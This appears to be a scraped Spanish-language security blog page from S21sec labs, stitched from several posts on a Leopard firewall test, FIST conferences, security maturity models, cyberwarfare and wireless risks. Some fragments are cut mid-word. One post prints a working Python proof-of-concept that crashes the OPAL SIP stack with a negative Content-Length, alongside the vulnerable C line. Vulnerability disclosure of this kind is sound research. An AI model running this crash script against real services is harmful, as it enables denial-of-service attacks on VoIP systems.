Justo después de que Apple anunciara el esperadísimo lanzamiento de su nuevo sistema operativo (Leopard) ya hay controversias sobre su seguridad.
Supuestamente Apple ha apostado por la seguridad para su nuevo lanzamiento, siendo una de las premisas en su diseño. Parece ser que tendrán que hacer algo para mejorar este aspecto porque algo tan importante como el correcto funcionamiento de su Firewall se pone en entredicho en este artículo.
El problema detectado es el decepcionante funcionamiento de su firewall, se le realizan una serie de pruebas de las que desafortunadamente no queda muy bien parado.
Por defecto el firewall no queda activado, da igual que en versiones anteriores lo estuviera, al actualizar se desactiva. El bloqueo de puertos tampoco es todo lo correcto que debiera, ya que aunque se seleccione que se bloqueen todas las conexiones entrantes algunas de ellas son accesibles desde el exterior.
Conclusión, volver a configurar al probado aunque vetusto “ipfw” para que solucione el problema.
José María Arce
S21sec labs
El pasado 26 de Octubre participamos en las Conferencias FIST edición Barcelona. El evento contó con la participación de más de 60 personas.
Por nuestra parte fue Christian Martorella de S21sec quien ofreció una presentación sobre técnicas de recolección de información de fuentes públicas (Information Gathering).
Podéis descargar la presentación de Christian en formato PDF.
PINDEX contentLength = mime.GetContentLength();...entityBody[contentLength] = '\0';
#!/usr/bin/python
# opal228_crash.py by Jose Miguel Esparza
# 2007 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: opal228_crash.py target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:paco@192.168.1.134 SIP/2.0\r\n"+\
"Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
"Contact:sip:pepe@192.168.1.133:5060\r\n"+\
"Content-Length:-40999990\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:pepe@192.168.1.133:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:paco@micasa.com\r\n"+\
"Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()
La madurez de un sistema de gestión de seguridad y su nivel de calidad son dos conceptos que, aunque relacionados entre ellos, no siempre son considerados como elementos independientes incluso, en ocasiones, pueden dar pie a confusión (un sistema maduro no necesariamente es un sistema de calidad). A través de estas líneas intentaremos aportar algo de luz a este asunto y establecer las diferencias principales entre ambos conceptos aplicados sobre la seguridad de la información.
La madurez de un sistema de gestión de seguridad acostumbra a dar una medida del progreso del programa a lo largo del tiempo, es decir, el grado de avance o despliegue de las iniciativas de seguridad respecto a un objetivo marcado. Conforme el programa madura:
Un modelo de madurez tradicionalmente empleado para la valoración de los controles es el definido por COBIT (Control Objectives for Information and related Technology) y basado en la metodología CMM (Capability Marurity Model) desarrollado por la Carnegie Mellon School.
El mencionado modelo se basa en cinco niveles de madurez de 0 (no existente) a 5 (Optimizado), según la evaluación de los objetivos de control de los procesos de Sistemas de Información.
Nivel 0 (NO EXISTENTE) : Ausencia total de procesos reconocibles.
Nivel 1 (INICIAL): No existen procesos estándar aunque sí planteamientos “ad hoc” que se utilizan en cada situación.
Nivel 2 (REPETIBLE): Los procesos han evolucionado de forma que se siguen procedimientos similares para realizar la misma tarea. No existe formación ni comunicación de procedimientos estándar y la responsabilidad recae en el individuo.
Nivel 3 (DEFINIDO): La organización asegura que el control se planifica, documenta, ejecuta, monitoriza y controla.
Nivel 4 (GESTIONADO): Los procesos están en mejora continúa y proporcionan mejores prácticas. Se usan herramientas automatizadas de manera aislada o fragmentada.
Nivel 5 (OPTIMIZADO): Los procesos han sido revisados hasta un nivel de “best practice”, sobre la base de una mejora continua.
Este enfoque permite ir midiendo la evolución o involución de los Sistemas de Iinformación, lo cual es un buen cuadro para presentar a la Dirección ya que claramente permite hacer un seguimiento aún a personas no familiarizadas con los conceptos técnicos.
Un nivel de madurez elevado, no obstante, no implica necesariamente que la organización este “segura”: en caso que los elementos de seguridad no se hayan ejecutado con un nivel de calidad elevado, la seguridad de la organización continuará siendo deficiente. Pongamos un ejemplo:
Una política de seguridad documentada y aprobada por la Dirección es un síntoma de un sistema maduro (nivel 3). No obstante el nivel de Calidad será:
Por tanto, es recomendable una medida separada que indique el nivel de Calidad de la implantación.
El nivel de Calidad debe dar información sobre la calidad de implantación de cada elemento. Conforme el nivel de calidad aumenta, los procesos se van implantando y son seguidos por todas las partes implicadas.
La progresión en el tiempo hacia un objetivo marcado en cuanto a la Calidad permitirá establecer las acciones necesarias para la consecución de dicho objetivo.
Por tanto, sería aconsejable disponer de un indicador propio del nivel de Calidad asociado al propio indicador de seguridad, con una gama bien definida de los valores que se consideran aceptable, inaceptable y excelente (Alta, Media y Baja calidad, si se prefiere) que pueda ser identificada fácilmente por el público objetivo a quien se comunica la medida......y poder responder a ¿Cómo estamos?.
En plena guerra fría, durante los primeros años del Macarthismo y la amenaza nuclear entre los Estados Unidos y la URSS, Albert Einstein, hacía pública una de sus más famosas citas:
cialmente llamativo el ataque sufrido por Estonia en Mayo de 2007, que sucedió poco después de que Estonia retirase un monumento de la era Soviética que recordaba la lucha de los soldados de la URSS contra el fascismo en la Segunda Guerra Mundial.
jetivo con el mínimo daño posible, como apunta este artículo producido también durante la guerra de Kosovo, o el siguiente artículo de la revista TIME del año 1995, en el que según dicho artículo la intención del ejercito americano es de “aprovechar las maravillas tecnológicas del siglo 20 para lanzar rápidos, sigilosos, amplios y devastadores ataques en la infraestructura miliar y civil de un enemigo”.
Durante esta semana se celebra en La Haya el eChallenges 2007, una conferencia de la Unión Europea sobre tecnología que dura tres días (del 24 al 26 de Octubre) con la participación de más de 600 participantes.
El próximo viernes 26 de Octubre se celebra una nueva edición de las conferencias FIST, evento gratuito y abierto al público en el que voluntarios realizan una serie de presentaciones y coloquios sobre diversos aspectos relacionados con los Test de Intrusión y la Seguridad de
El programa es el siguiente:
18:00: Introducción Edge Security
18:10: pf + CARP: Construyendo un cortafuegos en alta disponibilidad
Carlos Fragoso (one-Esecurity)
19:00: Si no quieres que sepa tu nombre, ¿porqué llevas el dni en la
frente? Christian Martorella (S21sec)
19:50: Descanso
20:00: Inspect a Gadget (in Windows Vista) Rafael Dominguez (MWR InfoSecurity)
20:50: Dudas, preguntas.
21:00: Cierre
Localización: Facultat d'Informatica de Barcelona - UPC Aula máster (Edificio A3) C/Jordi Girona Salgado, 1-3, 08034 BARCELONA
Inscripción: Podéis inscribiros en el evento a través del siguiente enlace: http://www.fistconference.org/inscripcion/inscripcion.php
Os esperamos!
El escenario actual de los Sistemas de Información presenta una problemática y unos retos en materia de seguridad distintos de los que tenían los Sistemas de Información centralizados con acceso limitado (mainframe) de hace 15 o 20 años. La complejidad tecnológica existente plantea la compatibilidad e interoperabilidad entre herramientas para minimizar los problemas de gestión, el aumento del volumen de información, las transacciones y accesos que se deben securizar, así como el constante incremento de los riesgos de seguridad de las redes.
Las Organizaciones ven hoy la seguridad de sus activos tecnológicos como un requerimiento imprescindible para mantenerse en el negocio. La seguridad, no obstante, no debe verse como la implantación de unos Sistemas novedosos más o menos complejos, para solventar un problema puntual, sino como un proceso más general de mejora continua, donde se busque la continuidad del negocio y que debe cubrir todas las áreas y departamentos de una Organización. Es necesario disponer de mecanismos que permitan evaluar las soluciones implantadas en su conjunto y determinar el nivel de seguridad alcanzado, ya sea para saber si se está en un nivel de seguridad adecuado o bien si se está degradando el nivel de seguridad con el paso del tiempo. Esta evaluación continuada permitirá actuar de manera proactiva respecto a la seguridad, siendo conscientes del nivel adquirido y el nivel deseado, siempre desde un punto de vista de un proceso continuado. La mera implantación de herramientas con configuraciones estáticas conducirá al deterioro progresivo de la seguridad, aumentando la diferencia entre el riesgo percibido y el riesgo real. A la inversa, la mera existencia de políticas, controles y revisiones de auditoria no son efectivas si no van acompañadas de herramientas y medidas técnicas que permitan respuestas rápidas y automatizadas y a condiciones de vulnerabilidad en permanente evolución. La seguridad es un proceso, no un producto.
Las políticas corporativas mencionadas anteriormente son también necesarias y éstas deben ser globales, de forma que afecten e impliquen a toda la Organización y que, sobre todo, cuenten con el respaldo de la Dirección. Estas políticas deben desencadenar el desarrollo y la definición de unos procesos y procedimientos basados en metodologías de trabajo, con la implantación de controles organizativos y con el establecimiento de procesos de medición y auditorias para verificar y controlar la implantación de las políticas.
Por concluir: la búsqueda de una solución global que permita la gestión de forma continuada de la seguridad de los Sistemas de Información no es una tarea fácil. Resulta difícil decir cual será la mejor solución o producto global, puesto que las necesidades de las organizaciones pueden ser completamente distintas unas de las otras. Sin embargo, para una correcta coordinación entre las diferentes áreas de actuación comentadas, se deberá considerar como claves los siguientes aspectos:
1.- Coherencia y Equilibrio técnico y funcional: mediante la integración tecnológica y la compatibilidad de las distintas herramientas, así como el uso de estándares y soluciones abiertas frente a plataformas propietarias. Esta coherencia debe ser tanto a nivel tecnológico como funcional, dando soporte a los procedimientos, políticas, controles y auditorias que permita unificar criterios.
2.- Escalabilidad/Disponibilidad: que garantice el rendimiento ante anchos de banda crecientes, que permita el crecimiento e implantación de nuevos módulos, re-usabilidad de componentes y facilidad de gestión y monitorización.
Las dos mejores soluciones obtendrá como premio una copia del libro: The Shellcoder's Handbook: Discovering and Exploiting Security Holes (segunda edición).
El congreso se estructuró en 9 sesiones que fundamentalmente se centraron en los siguientes temas: Evaluación y gestión del riesgo, modelado y representación de estos sistemas y sus dependencias, intercambio y compartición de información, continuidad de servicios ante situaciones imprevistas/previstas, seguridad técnica en SCADAs y modelado de amenazas y ataques. Además de los ponentes que defendían sus artículos hubo cuatro charlas invitadas (Adrian Gheorghe – Old Dominion University, US; Paulo Veríssimo – Universidade de Lisboa, Portugal; Donald Dudenhoeffer – Idaho National Labs, US; Jacques Bus – European Commission, INFSO Unit “Security”) que dieron interesantes puntos de vista sobre la importancia de la seguridad y la gestión del riesgo en las infraestructuras críticas así como de las actuales iniciativas a nivel europeo en esta materia.
De entre los artículos más interesantes destacamos:
WLAN es como normalmente se denominan las redes Wireless LAN de transmisión de datos. De todos es sabido que su utilización es cada vez mayor y su uso está muy extendido, ¿quién no ha usado o tiene un ordenador portátil (Laptop) con red wifi integrada?, es algo ya en un estándar mínimo en las configuraciones de los equipos. Ahora bien, el despliegue masivos de estos dispositivos y la posibilidad de interceptación, por su propia naturaleza, que tienen las redes inalámbricas hace que atacar redes de este tipo sea cada vez más sencillo.
Recientemente se ha publicado una noticia en la que se han robado multitud de información crítica de una tienda on-line (tarjetas de crédito, etc..) debido a la deficiente seguridad que utilizaban para sus comunicaciones y negligencias en el tratamiento de los datos.
Reflexionando sobre el tema, no se pretende ser alarmista, una red inalámbrica debidamente configurada ofrece unos niveles de seguridad aceptables, pero sí concienciar de que cualquier punto de la red puede ser un posible punto de intrusión. Desde S21sec Labs se están dedicando esfuerzos para ofrecer herramientas que permitan a las empresas poder detectar y defenderse ante este tipo de ataques.
Hoy ha empezado la reunión anual del Antiphishing Working Group (APWG), que esta vez tiene lugar en Pittsburgh (Pennsylvania), muy cerca de la Universidad de Carnegie Mellon, donde se encuentra uno de los principales CERT mundiales.
(+34 902 222 521)
24 horas / 7 días a la semana
© Copyright S21sec 2012 - Todos los derechos reservados
